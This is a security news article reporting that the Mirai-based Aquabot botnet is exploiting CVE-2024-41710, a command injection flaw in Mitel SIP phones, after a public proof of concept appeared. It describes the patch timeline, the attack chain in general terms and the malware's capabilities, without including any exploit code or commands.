1 day ago
2
A Mirai-based malware family this month started targeting vulnerable Mitel SIP phones to ensnare them into a botnet capable of distributed denial-of-service (DDoS) attacks, Akamai reports.
The malware, called Aquabot, attempts to exploit CVE-2024-41710, a high-severity command injection vulnerability affecting Mitel 6800, 6900, and 6900w series SIP phones, including 6970 Conference Unit.
In July 2024, Mitel announced firmware updates that patch the flaw, warning that its successful exploitation “could allow an authenticated attacker with administrative privilege to conduct a command injection attack due to insufficient parameter sanitization during the boot process”.
“A successful exploit of this vulnerability could allow an attacker to execute arbitrary commands within the context of the phone, with potential impacts on the confidentiality, integrity, and availability of the device,” Mitel said.
In August, PacketLabs’ Kyle Burns published proof-of-concept (PoC) exploit code targeting CVE-2024-41710, explaining that its root cause is the improper sanitization of user supplied input and that multiple endpoints in vulnerable firmware releases are affected.
The flaw could allow an attacker to use crafted HTTP POST requests to smuggle in entries that would otherwise be blocked by sanitization checks. By targeting a vulnerable endpoint, the researcher was able to update the device’s configuration file so that a prepended script would be executed during boot.
According to a fresh Akamai report, the first exploitation attempts targeting CVE-2024-41710 were seen in January 2025, roughly six months after the vulnerability was publicly disclosed.
The payload observed in these attacks was identical to Burns’ PoC code, and was used to spread malware to vulnerable Mitel SIP phones.
Advertisement. Scroll to continue reading.
“This payload will attempt to fetch and execute a shell script called ‘bin.sh’, which will in turn fetch and execute Mirai malware on the target system, with support for a variety of different architectures, like x86 and ARM,” Akamai explains.
The malware is a new variant of the Mirai-based Aquabot, with typical DDoS attack functions, and with new functionality that reports to the command-and-control (C&C) server when certain signals are caught, likely as means to monitor the bot’s health.
In addition to the Mitel flaw, Aquabot was also seen targeting vulnerabilities in Hadoop YARN, the Roxy-WI web interface, and in Linksys, Teltonika, Dasan GPON, and LB-LINK routers.
News of CVE-2024-41710’s exploitation came roughly three weeks after the US cybersecurity agency CISA warned that two security defects in the Mitel MiCollab enterprise collaboration platform, tracked as CVE-2024-41713 and CVE-2024-55550, have been exploited in the wild.
Related: Murdoc Botnet Ensnaring Avtech, Huawei Devices
Related: Record-Breaking DDoS Attack Reached 5.6 Tbps